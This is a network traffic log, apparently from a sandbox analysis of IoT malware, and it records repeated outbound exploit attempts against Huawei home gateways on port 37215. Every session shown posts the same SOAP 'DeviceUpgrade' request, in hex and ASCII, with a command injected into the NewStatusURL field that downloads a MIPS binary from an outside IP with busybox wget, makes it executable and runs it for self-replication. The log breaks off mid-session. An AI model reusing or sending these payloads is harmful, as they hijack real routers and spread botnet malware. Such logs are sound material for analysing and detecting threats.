                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  156192.168.2.1333984157.10.179.15337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.065726995 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  157192.168.2.1355976157.23.5.23537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.065746069 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  158192.168.2.1344020197.22.9.20337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.065764904 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  159192.168.2.134398842.93.122.18337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.065778971 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  160192.168.2.1334638197.176.135.6737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.065803051 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  161192.168.2.1333318197.232.84.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.065812111 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  162192.168.2.1348080157.115.244.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.065819979 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  163192.168.2.1354362157.225.119.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.066190958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  164192.168.2.135686020.247.172.2637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.066200018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  165192.168.2.1358954209.1.89.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.066242933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 